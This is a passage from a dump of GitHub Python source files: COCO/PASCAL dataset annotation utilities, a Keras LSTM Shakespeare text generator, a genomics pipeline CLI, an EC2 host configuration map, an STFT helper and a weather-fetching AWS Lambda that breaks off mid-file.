'VOC_JSON_From_COCO/pascal_' + mode + '.json'))\n\ndef get_cat_id_class_id_mapping(json_data):\n categories_dict = json_data['categories']\n # print(json_data)\n running_cat_id_bias = 1\n cat_id_class_id_mapping = {}\n for i_cat in range(len(categories_dict)):\n if i_cat+running_cat_id_bias != categories_dict[i_cat]['id']:\n running_cat_id_bias = categories_dict[i_cat]['id'] - i_cat\n # print(i_cat, running_cat_id_bias)\n cat_id_class_id_mapping[categories_dict[i_cat]['id']] = {'name': categories_dict[i_cat]['name'],\n 'class_label': i_cat}\n\n return cat_id_class_id_mapping\n\n\ndef get_image_id_image_path_dict(json_from_COCO, MSCOCO_Root_Path, mode):\n image_id_image_path_dict = {image['id']:MSCOCO_Root_Path+mode+'2014/'+image['file_name'] \\\n for image in json_from_COCO['images']}\n return image_id_image_path_dict\n\n\ndef get_image_id_image_path_dict_pascal(json_from_PASCAL, PASCAL_Root_Path, mode):\n image_id_image_path_dict = {image['id']:PASCAL_Root_Path+'JPEGImages/'+image['file_name'] \\\n for image in json_from_PASCAL['images']}\n return image_id_image_path_dict\n\n\ndef get_annotation_dict(json_data, image_id_image_path_dict, cat_id_class_id_mapping_dict):\n print(len(cat_id_class_id_mapping_dict))\n annotation_dict = {image['id']:{'bbox_info':[], 'image_path':image_id_image_path_dict[image['id']], \\\n 'classification_labels':[0]*len(cat_id_class_id_mapping_dict)} for image in json_data['images']}\n\n # print(annotation_dict)\n for annotation in json_data['annotations']:\n try:\n annotation_dict[annotation['image_id']]['bbox_info'].append({'bbox':annotation['bbox'], \\\n 'category_id':annotation['category_id'], \\\n 'class_id':cat_id_class_id_mapping_dict[annotation['category_id']]['class_label'], \\\n # 'category':json_from_COCO['categories'][annotation['category_id']-1]['name']})\n 'category':cat_id_class_id_mapping_dict[annotation['category_id']]['name']})\n except IndexError:\n from IPython.core.debugger import set_trace; set_trace()\n # try:\n # print(annotation_dict[annotation['image_id']])\n # print(cat_id_class_id_mapping_dict)\n annotation_dict[annotation['image_id']]['classification_labels'][cat_id_class_id_mapping_dict[annotation['category_id']]['class_label']] = 1\n # except:\n # print(annotation)\n# from IPython.core.debugger import set_trace; set_trace()\n return annotation_dict\n\ndef prep_annotation_json(MSCOCO_Root_Path, mode):\n if not os.path.isfile(MSCOCO_Root_Path + mode + '_MSCOCO_annotation.json'):\n # Load the json from COCO\n MSCOCO_2014_json = load_MSCOCO_2014_json(mode, MSCOCO_Root_Path)\n # Create a dict with image ids as keys and image paths as values\n image_id_image_path_dict_2014 = get_image_id_image_path_dict(MSCOCO_2014_json, MSCOCO_Root_Path, mode)\n # MSCOCO does not have continuous class ids. So make them continuous\n cat_id_class_id_mapping_dict = get_cat_id_class_id_mapping(MSCOCO_2014_json)\n # Create a dict with image ids as keys and bounding box infos and image paths as values\n annotation_dict = get_annotation_dict(MSCOCO_2014_json, image_id_image_path_dict_2014, cat_id_class_id_mapping_dict)\n\n # Save the json\n with open(MSCOCO_Root_Path + mode + '_MSCOCO_annotation.json', 'w') as outfile:\n outfile.write(json.dumps(annotation_dict,sort_keys=True, indent=2, separators=(',', ': ')))\n\n # Save the cat_id_class_id_mapping_dict\n with open(MSCOCO_Root_Path + mode + '_MSCOCO_cat_id_class_id_mapping.json', 'w') as outfile:\n outfile.write(json.dumps(cat_id_class_id_mapping_dict,sort_keys=True, indent=2, separators=(',', ': ')))\n\ndef prep_annotation_json_pascal(PASCAL_Root_Path, mode):\n if not os.path.isfile(PASCAL_Root_Path + mode + '_PASCAL_annotation.json'):\n # Load the json from COCO\n PASCAL_2007_json = load_PASCAL_2007_json(mode, PASCAL_Root_Path)\n # Create a dict with image ids as keys and image paths as values\n image_id_image_path_dict_2007 = get_image_id_image_path_dict_pascal(PASCAL_2007_json, PASCAL_Root_Path, mode)\n # MSCOCO does not have continuous class ids. So make them continuous\n cat_id_class_id_mapping_dict = get_cat_id_class_id_mapping(PASCAL_2007_json)\n # Create a dict with image ids as keys and bounding box infos and image paths as values\n annotation_dict = get_annotation_dict(PASCAL_2007_json, image_id_image_path_dict_2007, cat_id_class_id_mapping_dict)\n\n # Save the json\n with open(PASCAL_Root_Path + mode + '_PASCAL_annotation.json', 'w') as outfile:\n outfile.write(json.dumps(annotation_dict,sort_keys=True, indent=2, separators=(',', ': ')))\n\n # Save the cat_id_class_id_mapping_dict\n with open(PASCAL_Root_Path + mode + '_PASCAL_cat_id_class_id_mapping.json', 'w') as outfile:\n outfile.write(json.dumps(cat_id_class_id_mapping_dict,sort_keys=True, indent=2, separators=(',', ': ')))\n\n\ndef prep_annotation_json_pascal12(PASCAL_Root_Path, mode):\n if not os.path.isfile(PASCAL_Root_Path + mode + '_PASCAL_annotation.json'):\n # Load the json from COCO\n PASCAL_2012_json = load_PASCAL_2012_json(mode, PASCAL_Root_Path)\n # Create a dict with image ids as keys and image paths as values\n image_id_image_path_dict_2012 = get_image_id_image_path_dict_pascal(PASCAL_2012_json, PASCAL_Root_Path, mode)\n # MSCOCO does not have continuous class ids. So make them continuous\n cat_id_class_id_mapping_dict = get_cat_id_class_id_mapping(PASCAL_2012_json)\n # Create a dict with image ids as keys and bounding box infos and image paths as values\n annotation_dict = get_annotation_dict(PASCAL_2012_json, image_id_image_path_dict_2012, cat_id_class_id_mapping_dict)\n\n # Save the json\n with open(PASCAL_Root_Path + mode + '_PASCAL_annotation.json', 'w') as outfile:\n outfile.write(json.dumps(annotation_dict,sort_keys=True, indent=2, separators=(',', ': ')))\n\n # Save the cat_id_class_id_mapping_dict\n with open(PASCAL_Root_Path + mode + '_PASCAL_cat_id_class_id_mapping.json', 'w') as outfile:\n outfile.write(json.dumps(cat_id_class_id_mapping_dict,sort_keys=True, indent=2, separators=(',', ': ')))\n\ndef class_specific_annotation_json(Root_Path, dataset, mode, class_index):\n\n annotation = pd.DataFrame.from_dict(json.load(open(Root_Path + mode + '_'+dataset+'_annotation.json')),orient='index')\n annotation.reset_index(level=0, inplace=True)\n classification_labels = annotation['classification_labels']\n ids = []\n for idx in range(len(annotation)):\n if classification_labels[idx][class_index] == 1:\n ids.append(idx)\n filtered_annotations = annotation.iloc[ids,1:]\n annotation_dictionary = pd.DataFrame.to_dict(filtered_annotations, orient='index')\n\n with open(Root_Path + mode + '_class_{}_'.format(class_index)+dataset+'_annotation.json', 'w') as fp:\n json.dump(annotation_dictionary, fp, indent=4)\n\n\ndef getImageNet(IMAGENET_Root_Path, datasetType='train', class_id=-1, no_of_training_classes = 100, idx=-1):\n \n tsfrm_imgnet = transforms.Compose([Rescale((224, 224)),\n MakeCHWformat(),\n ToTensor(),\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n dataset = None\n if class_id == -1:\n dataset = ImageNet(IMAGENET_Root_Path+'imagenet_'+datasetType+'.csv', 0, 999, tsfrm_imgnet, idx)\n else:\n dataset = ImageNet(IMAGENET_Root_Path+'imagenet_'+datasetType+'.csv', class_id, class_id + no_of_training_classes - 1, tsfrm_imgnet, idx)\n \n return dataset\n\ndef getPASCAL(PASCAL_Root_Path, datasetType='train', class_id=-1, idx=-1):\n prep_annotation_json_pascal(PASCAL_Root_Path, datasetType)\n if class_id != -1:\n class_specific_annotation_json(PASCAL_Root_Path, 'PASCAL', datasetType, class_id)\n \n tsfrm = transforms.Compose([Rescale((224, 224)),\n ScaleIntensities(),\n MakeCHWformat(),\n RGBtoBGR(),\n ToTensor(),\n Normalize([104.01, 116.67, 122.68])\n ])\n\n dataset = None\n if class_id == -1:\n dataset = MSCOCO_Dataset(json_file=PASCAL_Root_Path + datasetType + '_PASCAL_annotation.json',transform=tsfrm, idx = idx)\n else :\n dataset = MSCOCO_Dataset(json_file=PASCAL_Root_Path + datasetType + '_class_{}_PASCAL_annotation.json'.format(class_id) ,transform=tsfrm, idx = idx)\n \n return dataset\n\ndef getPASCAL12(PASCAL_Root_Path, datasetType='train', class_id=-1, idx=-1):\n prep_annotation_json_pascal12(PASCAL_Root_Path, datasetType)\n if class_id != -1:\n class_specific_annotation_json(PASCAL_Root_Path, 'PASCAL', datasetType, class_id)\n\n tsfrm = transforms.Compose([Rescale((224, 224)),\n MakeCHWformat(),\n ToTensor(),\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n\n dataset = None\n if class_id == -1:\n dataset = MSCOCO_Dataset(json_file=PASCAL_Root_Path + datasetType + '_PASCAL_annotation.json',transform=tsfrm, idx = idx)\n else :\n dataset = MSCOCO_Dataset(json_file=PASCAL_Root_Path + datasetType + '_class_{}_PASCAL_annotation.json'.format(class_id) ,transform=tsfrm, idx = idx)\n \n return dataset\n\ndef getMSCOCO(MSCOCO_Root_Path, datasetType='train', class_id=-1, idx = -1):\n prep_annotation_json(MSCOCO_Root_Path, datasetType)\n if class_id != -1:\n class_specific_annotation_json(MSCOCO_Root_Path,'MSCOCO', datasetType, class_id)\n \n tsfrm = transforms.Compose([Rescale((224, 224)),\n ScaleIntensities(),\n MakeCHWformat(),\n RGBtoBGR(),\n ToTensor(),\n Normalize([104.01, 116.67, 122.68])\n ])\n dataset = None \n # tsfrm = None \n if class_id == -1:\n dataset = MSCOCO_Dataset(json_file=MSCOCO_Root_Path + datasetType + '_MSCOCO_annotation.json',transform=tsfrm, idx= idx)\n else :\n dataset = MSCOCO_Dataset(json_file=MSCOCO_Root_Path + datasetType + '_class_{}_MSCOCO_annotation.json'.format(class_id) ,transform=tsfrm, idx=idx)\n \n return dataset","repo_name":"CVIR/RExL","sub_path":"RExL/explainableAI/utils/dataset_util.py","file_name":"dataset_util.py","file_ext":"py","file_size_in_byte":20016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34647095482","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nPurpose: Word level Natural Language Generation (NLG). This file loads a\r\n previously trained word NLG model from LanguageGenWords_train.py, \r\n and predicts subsequent words. \r\n\r\nTo run: \r\n 1) Set constants below to be the same as the languagegenwords_train.py file\r\n 2) At Anaconda command prompt enter\r\n >> python languagegenwords_predict.py\r\n\r\n\"\"\"\r\n\r\n# ---\r\n# Libs\r\n\r\nimport os\r\nfrom datetime import datetime, timedelta\r\n\r\nimport re\r\nimport numpy as np\r\nfrom nltk import tokenize\r\n\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Embedding, LSTM, Dense, Dropout, Bidirectional\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\nfrom tensorflow.keras.preprocessing.text import Tokenizer\r\nfrom tensorflow.keras import utils as keras_utils\r\n\r\n# ---\r\n# Constants\r\n\r\n# Set CURR_DIR to the subdir with this PY file. Everything else is relative to this subdir.\r\nCURR_DIR = \"C:\\\\NaturalLanguageGen\\\\code\"\r\n\r\n# Predictions reuses the previously cleaned file.\r\nINPUT_FILE = '..\\\\data\\\\Complete_Shakespeare_cleaned.txt'\r\n\r\nMODEL_WEIGHTS_FILE = \"..\\\\Saved_Model\\\\training_GenWords\\\\cp_Epoch_{epoch:02d}_Loss_{loss:.3f}.ckpt\"\r\nMODEL_WEIGHTS_DIR = os.path.dirname(MODEL_WEIGHTS_FILE)\r\n\r\n# The constants below MUST be the SAME as the model trained in LanguageGenChars_training.py.\r\nMAX_SEQ_LEN = 160\r\n#BATCH_SIZE = 256\r\nUNITS = 128\r\nOUTPUT_DIM = 32\r\n\r\n\r\n# ---\r\n# Funcs\r\n\r\ndef clean_text(text):\r\n \"\"\"\r\n Purpose: Pass a string, this func will remove everything and only leave \r\n A-Z, a-z and sentence endings. It will also remove brackets [] and \r\n everything between those brackets like [_Exit._], [_Exeunt._], etc. \r\n \"\"\"\r\n\r\n # Remove brackets and the text within the brackets. \r\n text = \"\".join(re.split(\"\\(|\\)|\\[|\\]\", text)[::2])\r\n\r\n # Remove quotes and replace with no space. \r\n text = re.sub(r\"[\\'\\\"\\‘\\’\\`\\ʹ]\", \"\", text) \r\n \r\n # Keep only a-z and sentence endings, everything else gets a space. \r\n new_string = re.sub(\"[^a-zA-Z.?!;]\", \" \", text).strip()\r\n \r\n # Remove consective spaces and leave only one space.\r\n new_string = re.sub(\" +\", \" \", new_string)\r\n \r\n new_string = new_string.lower()\r\n \r\n return(new_string)\r\n\r\n\r\ndef generate_text(seed_text, max_words, max_sequence_len, model, tokenizer):\r\n \"\"\"\r\n Purpose: Given a previously trained NLG model trained on words, pass a \r\n string of seed text and other params to predict new text. \r\n \r\n Created this function from the code below. \r\n \r\n Source: https://colab.research.google.com/github/tensorflow/examples/blob/master/courses/udacity_intro_to_tensorflow_for_deep_learning/l10c03_nlp_constructing_text_generation_model.ipynb#scrollTo=DC7zfcgviDTp&line=1&uniqifier=1\r\n Apache License 2.0.\r\n \"\"\"\r\n \r\n # Clean and lowercase the seed_text so it's like the text used in training.\r\n seed_text = clean_text(seed_text)\r\n \r\n # Convert seed text to a list, add padding, predict the next word, add\r\n # that predicted word to the end of the seed text string and repeat. \r\n for _ in range(max_words):\r\n \ttoken_list = tokenizer.texts_to_sequences([seed_text])[0]\r\n \ttoken_list = pad_sequences([token_list], maxlen=max_sequence_len-1, padding='pre')\r\n \tprediction = np.argmax(model.predict(token_list), axis=-1)\r\n \tpred_word = \"\"\r\n \r\n \tfor word, index in tokenizer.word_index.items():\r\n \t\tif index == prediction:\r\n \t\t\tpred_word = word\r\n \t\t\tbreak\r\n \r\n \tseed_text += \" \" + pred_word\r\n \r\n return(seed_text)\r\n\r\n# ---\r\n# Main\r\n\r\nstart_time = datetime.now()\r\n\r\nos.chdir(CURR_DIR)\r\n\r\n# Load the previously cleaned file.\r\nwith open(INPUT_FILE, 'r', encoding='utf-8') as file:\r\n text = file.read()\r\n\r\n\r\n# NOTE: No need to clean here since the previously cleaned TXT file from \r\n# the training file is reused here. \r\n# Clean the data and lowercase to reduce the number of tokens in the vocabulary. \r\n#text = clean_text(raw_text)\r\n\r\n# Save the cleaned text to see the text the model used. \r\n#with open(OUTPUT_FILE, 'w', encoding='utf-8') as file:\r\n# file.write(text)\r\n\r\n# Split by sentence endings. This will allow us to dynamically determine the \r\n# sequence length.\r\ntok_sents = tokenize.sent_tokenize(text)\r\n\r\ntokenizer = Tokenizer()\r\ntokenizer.fit_on_texts(tok_sents)\r\n\r\n# Get the total number of all words in the doc... just some stats about the data.\r\ntotal_word_count = 0\r\nfor key, value in tokenizer.word_counts.items(): \r\n total_word_count = total_word_count + value\r\n\r\n# Each unique word in the input_file will be given a unique integer. This is \r\n# the size of our vocabulary. \r\n# Example:\r\n#print(tokenizer.word_index)\r\nunique_word_cnt = len(tokenizer.word_index) + 1\r\n\r\nprint (\"Total number of all words:\", total_word_count)\r\nprint (\"Total unique words:\", unique_word_cnt)\r\n\r\n# Each text sequence is converted to a sequence of unique integers. The \r\n# tokenizer.word_index dictionary is used to create this mapping.\r\nsequences = tokenizer.texts_to_sequences(tok_sents)\r\n\r\n# Since the text was split into sentences, most sentences will have different\r\n# lengths. Therefore, need to pad the sequences so they have equal lengths. \r\n\r\n# Find the length of the longest sequence. Since this is a dymamic value driven \r\n# by the input file, it could be a malformed input file so ensure that any single\r\n# sequence doesn't go beyond the constant MAX_SEQ_LEN above. Below pad_sequences() \r\n# will trucate sequences if necessary. \r\nmax_sequence_len = max([len(x) for x in sequences])\r\n\r\nif max_sequence_len > MAX_SEQ_LEN:\r\n max_sequence_len = MAX_SEQ_LEN\r\n\r\n# To make each sequence the same length, add padding at the beginning of the sequence. \r\n# Also, truncate sequences from the beginning if they that exceeed the maxlen. \r\n# More info: https://www.tensorflow.org/api_docs/python/tf/keras/preprocessing/sequence/pad_sequences\r\nsequences = np.array(pad_sequences(sequences, maxlen = max_sequence_len, padding='pre', truncating = 'pre'))\r\n\r\nprint (\"\\nNumber of patterns:\", len(sequences))\r\n\r\n# A given set of sequence indicies in x_seq_num, should predict a particular \r\n# index stored in y_pred_num.\r\nx_seq_num, y_pred_num = sequences[:,:-1],sequences[:,-1]\r\n\r\n# One-hot encode the words to be predicted. \r\ny = keras_utils.to_categorical(y_pred_num, num_classes = unique_word_cnt)\r\n\r\ninput_len = max_sequence_len - 1 \r\n\r\n\r\n# A simple model. \r\nmodel = Sequential()\r\nmodel.add(Embedding(unique_word_cnt, OUTPUT_DIM, input_length = input_len, name = \"layer_1\"))\r\nmodel.add(LSTM(UNITS, name = \"layer_2\"))\r\nmodel.add(Dropout(0.2, name = \"layer_3\"))\r\nmodel.add(Dense(unique_word_cnt, activation ='softmax', name = \"layer_4\"))\r\n\r\n'''\r\n# More advanced model. \r\nmodel = Sequential()\r\nmodel.add(Embedding(unique_word_cnt, OUTPUT_DIM, input_length = input_len))\r\nmodel.add(Bidirectional(LSTM(UNITS)))\r\nmodel.add(Dense(unique_word_cnt, activation='softmax'))\r\n'''\r\n\r\nmodel.summary()\r\n\r\n# Compile the model above.\r\nmodel.compile(loss = 'categorical_crossentropy', \r\n optimizer = 'adam',\r\n #optimizer = RMSprop(learning_rate=0.01), # Maybe try a different optimizer and learning rate. \r\n metrics = ['accuracy'])\r\n\r\n# Optional print to see details of the model for logging and comparisons. \r\nprint(\"\\nModel Config:\\n%s\\n\" % model.get_config())\r\n\r\n# Optional: Evaluate the Untrained model. \r\nprint(\"\\nEvaluating the untrained model...\")\r\nloss, acc = model.evaluate(x_seq_num, y, verbose=2)\r\nprint(\"\\nUntrained model accuracy: {:5.2f}%\".format(100 * acc))\r\n\r\n# Load the best performing model. \r\nmodel_weights = tf.train.latest_checkpoint(MODEL_WEIGHTS_DIR) \r\nprint(\"\\nLoading best model weight file: %s\" % model_weights)\r\nmodel.load_weights(model_weights)\r\n\r\n# Required - Re-evaluate the model. \r\nprint(\"\\nEvaluating the trained model...\")\r\nloss, acc = model.evaluate(x_seq_num, y, verbose=2)\r\nprint(\"\\nRestored model accuracy: {:5.2f}%\".format(100 * acc))\r\n\r\n# Now, predict new text. Real Shakespeare in seed_text. \r\n#seed_text = \"from fairest creatures we desire increase that thereby beauty rose might never die\"\r\nseed_text = \"to be or not to be that is the question\"\r\n\r\ntext = generate_text(seed_text, 20, max_sequence_len, model, tokenizer)\r\nprint(\"\\nSeed text:\\n\", seed_text)\r\nprint(\"\\nGenerated text:\\n\", text)\r\n\r\n# Print stats about the run.\r\nend_time = datetime.now()\r\nelapsed_time = end_time - start_time\r\ntime_diff_mins = elapsed_time / timedelta(minutes=1)\r\nprint(\"\\nTotal runtime %.1f minutes or %.1f hours.\" % (time_diff_mins, time_diff_mins / 60))\r\n\r\n\r\n","repo_name":"craiggua/NaturalLanguageGen","sub_path":"code/LanguageGenWords_Predict.py","file_name":"LanguageGenWords_Predict.py","file_ext":"py","file_size_in_byte":8671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73988048693","text":"\"\"\"Run analysis pipeline for NGS data.\n\nHandles runs in local or distributed mode based on the command line or\nconfigured parameters.\n\nAuthor: Shujia Huang\nDate: 2020-04-19\n\n\"\"\"\nimport argparse\nimport sys\nimport yaml\nfrom pathlib import Path\nfrom datetime import datetime\n\n# Import specific functions of ilus\nfrom ilus.pipeline import (\n WGS, create_wgs_pipeline_command,\n genotypeGVCFs, create_genotype_joint_calling_command,\n variantrecalibrator, create_vqsr_command\n)\nfrom ilus.modules.utils import split_jobs, check_jobs_status\n\nPROG_NAME = \"ilus\"\nVERSION = \"1.3.2\"\n\n\ndef create_split_job_command(commands):\n # Create subparser for the \"split-jobs\" command\n split_job_cmd = commands.add_parser(\"split-jobs\", help=\"Split the whole shell into multiple jobs.\")\n split_job_cmd.add_argument(\n \"-I\", \"--input\",\n dest=\"input\",\n required=True,\n help=\"Input shell file.\"\n )\n split_job_cmd.add_argument(\n \"-p\", \"--prefix\",\n dest=\"prefix\",\n type=str,\n default=\"work\",\n help=\"The prefix name for output sub-shell. (default: %(default)s)\"\n )\n split_job_cmd.add_argument(\n \"-n\", \"--number\",\n dest=\"number\",\n type=int,\n required=True,\n help=\"Number of sub job.\"\n )\n split_job_cmd.add_argument(\n \"-t\", \"--parallel\",\n dest=\"t\",\n type=int,\n required=True,\n help=\"Parallel number for per sub job.\"\n )\n\n return\n\n\ndef create_check_job_command(commands):\n # Create subparser for the \"check-jobs\" command\n check_job_cmd = commands.add_parser(\"check-jobs\", help=\"Check the jobs have finished or not.\")\n check_job_cmd.add_argument(\n \"-I\", \"--input\",\n dest=\"input\",\n required=True,\n help=\"Task log file with suffix '.o.log.list’. For ilus pipeline, which could always \"\n \"be found in the folder 'loginfo/', e.g.: loginfo/01.alignment.o.log.list\"\n )\n\n return\n\n\ndef parse_commandline_args():\n \"\"\"Parse input commandline arguments, handling multiple cases.\n \"\"\"\n cmdparser = argparse.ArgumentParser(\n prog=PROG_NAME,\n description=f\"{PROG_NAME} (Version = {VERSION}): A WGS/WES analysis pipeline generator.\",\n epilog=\"That's how you can use %(prog)s\"\n )\n\n cmdparser.add_argument(\n \"-v\", \"--version\",\n action=\"store_true\",\n help=f\"show the version of {PROG_NAME} and exit.\"\n )\n\n commands = cmdparser.add_subparsers(dest=\"command\", title=f\"{PROG_NAME} commands\")\n\n # The arguments for the whole pipeline of WGS.\n create_wgs_pipeline_command(commands)\n\n # The arguments for joint-calling process\n create_genotype_joint_calling_command(commands)\n\n # The arguments for VQSR process\n create_vqsr_command(commands)\n\n # Utility tools\n create_split_job_command(commands)\n create_check_job_command(commands)\n\n return cmdparser.parse_args()\n\n\ndef load_config(config_file):\n with open(config_file) as f:\n return yaml.safe_load(f)\n\n\ndef get_intervals(interval_file):\n if not Path(interval_file).is_file():\n raise ValueError(f\"Invalid interval file: {interval_file}\")\n\n with open(interval_file) as f:\n \"\"\"Bed format:\n chr1\t10001\t207666\n chr1\t257667\t297968\n \"\"\"\n return [line.strip().split()[:3] for line in f if not line.startswith(\"#\")]\n\n\ndef run_command(args):\n if args.version:\n print(f\"{PROG_NAME} {VERSION}\", file=sys.stderr)\n sys.exit(0)\n\n if args.command is None:\n print(f\"Please type: {PROG_NAME} -h or {PROG_NAME} --help to show the help message.\\n\",\n file=sys.stderr)\n sys.exit(1)\n\n if args.command == \"split-jobs\":\n split_jobs(args.input, args.number, args.t, prefix=args.prefix)\n return\n\n if args.command == \"check-jobs\":\n check_jobs_status(args.input)\n return\n\n runner = {\n \"WGS\": WGS,\n \"genotype-joint-calling\": genotypeGVCFs,\n \"VQSR\": variantrecalibrator,\n }\n\n if args.command not in runner:\n raise ValueError(f\"Invalid command: {args.command}\")\n\n # loaded global configuration file\n config = load_config(args.sysconf)\n\n if \"variant_calling_interval\" in config[\"gatk\"]:\n if (type(config[\"gatk\"][\"variant_calling_interval\"]) is str) \\\n and (Path(config[\"gatk\"][\"variant_calling_interval\"]).is_file()):\n # A file for recording interval\n interval_file = config[\"gatk\"][\"variant_calling_interval\"]\n # reset the value to be a list of interval regions\n config[\"gatk\"][\"variant_calling_interval\"] = get_intervals(interval_file)\n\n elif type(config[\"gatk\"][\"variant_calling_interval\"]) is not list:\n raise ValueError(f\"'variant_calling_interval' parameter could only be a file path or \"\n f\"a list of chromosome id in the configure file: {args.sysconf}.\\n\")\n\n else:\n raise ValueError(f\"'variant_calling_interval' parameter is required \"\n f\"in the configure file: {args.sysconf}.\\n\")\n\n # recording all information into one single dict.\n aione = {\"config\": config}\n runner[args.command](args, aione)\n\n return\n\n\ndef main():\n START_TIME = datetime.now()\n\n args = parse_commandline_args()\n run_command(args)\n\n elapsed_time = datetime.now() - START_TIME\n print(f\"\\n{PROG_NAME} (version: {VERSION}) for '{args.command}' done, \"\n f\"{elapsed_time.seconds} seconds elapsed.\", file=sys.stderr)\n\n return\n","repo_name":"ShujiaHuang/ilus","sub_path":"ilus/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"21"} +{"seq_id":"22618776716","text":"#!/usr/bin/env python\nTEST_AWSHOSTS = ['ec2-13-127-218-103.ap-south-1.compute.amazonaws.com']\nDEV_AWSHOSTS = ['localhost']\nPROD_AWSHOSTS = ['ec2-35-154-204-254.ap-south-1.compute.amazonaws.com',\n 'ec2-13-126-102-44.ap-south-1.compute.amazonaws.com']\nSTG_AWSHOSTS = ['ec2-35-154-81-185.ap-south-1.compute.amazonaws.com']\nLOCALHOST = ['localhost']\n\nALLHOSTS = {\n 'stage': {\n 'RABBITSERVER': LOCALHOST,\n 'RECOSERVER': STG_AWSHOSTS,\n 'LOCATIONSERVER':STG_AWSHOSTS,\n 'WIZSERVER': STG_AWSHOSTS,\n 'NGINX': STG_AWSHOSTS,\n 'MEMCACHE': STG_AWSHOSTS,\n },\n 'dev': {\n 'RABBITSERVER': LOCALHOST,\n\t 'LOCATIONSERVER':DEV_AWSHOSTS,\n 'RECOSERVER': DEV_AWSHOSTS,\n 'WIZSERVER': DEV_AWSHOSTS,\n 'NGINX': DEV_AWSHOSTS,\n 'MEMCACHE': DEV_AWSHOSTS,\n },\n 'test': {\n 'RABBITSERVER': LOCALHOST,\n\t 'RECOSERVER' : TEST_AWSHOSTS,\n 'LOCATIONSERVER': TEST_AWSHOSTS,\n 'WIZSERVER': TEST_AWSHOSTS,\n 'NGINX': TEST_AWSHOSTS,\n 'MEMCACHE': TEST_AWSHOSTS,\n },\n 'prod': {\n 'RABBITSERVER': LOCALHOST,\n 'LOCATIONSERVER': [PROD_AWSHOSTS[0]],\n 'WIZSERVER': PROD_AWSHOSTS,\n 'NGINX': PROD_AWSHOSTS,\n 'MEMCACHE': PROD_AWSHOSTS,\n }\n}\n\nRUNHOSTS = {\n 'dev': {\n 'LOCATIONSERVER': ['localhost'],\n 'MEMCACHE': ['localhost:11211'],\n 'NGINX': ['localhost'],\n 'RABBITSERVER': ['localhost'],\n 'RECOSERVER': ['localhost'],\n 'WIZSERVER': ['localhost']\n },\n 'prod': {\n 'LOCATIONSERVER': ['172.31.28.254'],\n 'MEMCACHE': ['172.31.26.42:11211',\n '172.31.28.254:11211'],\n 'NGINX': ['172.31.26.42',\n '172.31.28.254'],\n 'RABBITSERVER': ['localhost'],\n 'WIZSERVER': ['172.31.26.42',\n '172.31.28.254']\n },\n 'stage': {\n 'LOCATIONSERVER': ['172.31.9.38'],\n 'MEMCACHE': ['172.31.9.38:11211'],\n 'NGINX': ['172.31.9.38'],\n 'RABBITSERVER': ['localhost'],\n 'RECOSERVER': ['172.31.9.38'],\n 'WIZSERVER': ['172.31.9.38']\n },\n 'test': {\n 'LOCATIONSERVER': ['172.31.24.237'],\n 'MEMCACHE': ['172.31.24.237:11211'],\n 'NGINX': ['172.31.24.237'],\n 'RABBITSERVER': ['localhost'],\n 'RECOSERVER': ['172.31.24.237'],\n 'WIZSERVER': ['172.31.24.237']}\n}\n","repo_name":"wizcarder/wizcard-server","sub_path":"wizcard/instances.py","file_name":"instances.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1565690604","text":"def stft(sig, frameSize, overlapFac=0.75, window=np.hanning):\n \"\"\" short time fourier transform of audio signal \"\"\"\n win = window(frameSize)\n hopSize = int(frameSize - np.floor(overlapFac * frameSize))\n # zeros at beginning (thus center of 1st window should be for sample nr. 0)\n # samples = np.append(np.zeros(np.floor(frameSize / 2.0)), sig)\n samples = np.array(sig, dtype='float64')\n # cols for windowing\n cols = np.ceil((len(samples) - frameSize) / float(hopSize)) + 1\n # zeros at end (thus samples can be fully covered by frames)\n samples = np.append(samples, np.zeros(frameSize))\n frames = stride_tricks.as_strided(\n samples,\n shape=(cols, frameSize),\n strides=(samples.strides[0] * hopSize, samples.strides[0])).copy()\n frames *= win\n return np.fft.rfft(frames) \n","repo_name":"mehmetpekmezci/urban_sound_classification","sub_path":"examples/stft.py","file_name":"stft.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"40907825612","text":"import json\nimport os\n\nimport requests\nfrom Job import Job\nfrom job_handler import parseString\nfrom QueueObj import QueueObj\n\n\ndef get_weather(city, elementName):\n url = \"https://opendata.cwb.gov.tw/api/v1/rest/datastore/F-C0032-001\"\n headers = {\"user-agent\": \"Mozilla/5.0\"}\n params = {\n \"Authorization\": os.getenv(\"OPEN_API_KEY\"),\n \"format\": \"JSON\",\n \"locationName\": city,\n \"sort\": \"time\",\n \"limit\": 1,\n \"offset\": 0,\n \"elementName\": elementName,\n }\n res = requests.get(url, params=params, headers=headers)\n\n if res.status_code != 200 or res.headers[\"Content-Type\"] != \"application/json;charset=utf-8\":\n print(\"取得天氣資料發生錯誤\", res.status_code)\n return False\n data = res.json()\n if len(data[\"records\"][\"location\"]) == 0:\n print(\"此筆天氣資料為空\", data[\"records\"])\n return False\n weather_element_value = data[\"records\"][\"location\"][0][\"weatherElement\"][0]\n return weather_element_value\n\n\ndef parse_weather_temp(weather_status):\n return {\"temperature\": int(weather_status[\"time\"][0][\"parameter\"][\"parameterName\"])}\n\n\ndef lambda_handler(event, context):\n print(\"START EVENT\", event)\n # 每個function 都要做的事\n body = json.loads(event[\"Records\"][0][\"body\"])\n print(f\"來源內容{body}\")\n queue_obj = QueueObj(None, body)\n current_job = Job(queue_obj.steps[queue_obj.step_now])\n current_job.update_start_time() # 更新開始時間\n customer_input = current_job.parse_customer_input(queue_obj.steps)\n\n # get_weather 獨特做的事\n city = customer_input[\"city\"]\n condition = customer_input[\"condition\"]\n # temperature = customer_input[\"temperature\"]\n weather_status = get_weather(city, condition)\n if not weather_status:\n job_status = \"failed\"\n results_output = {}\n for output in parseString(current_job.config_output):\n results_output[output[\"name\"]] = 